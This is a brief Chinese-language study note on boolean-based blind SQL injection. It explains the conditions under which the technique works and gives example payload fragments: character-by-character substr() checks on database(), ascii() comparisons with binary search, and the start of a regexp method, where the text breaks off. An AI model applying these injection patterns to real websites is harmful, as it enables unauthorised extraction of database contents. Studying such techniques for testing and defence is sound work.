布尔注入利用条件:
页面没有显示位和SQL语句执行错误的报错信息
bool注入
遍历:
可以用select * from table_name where id = 1 and substr(database(),1,1)='a'的方式
(查看数据库名字第一位是否是a)然后修改substr()参数为2,1查看第二位。。。以此类推遍历所有可能性,这样比较麻烦
所以一般使用ascii码结合二分法进行遍历
select * from table_name where id = 1 and ascii(substr(database(),1,1))>65
对照ascii码表结合二分法进行遍历
正则匹配:
select * from table_name where id = 1 and database() regexp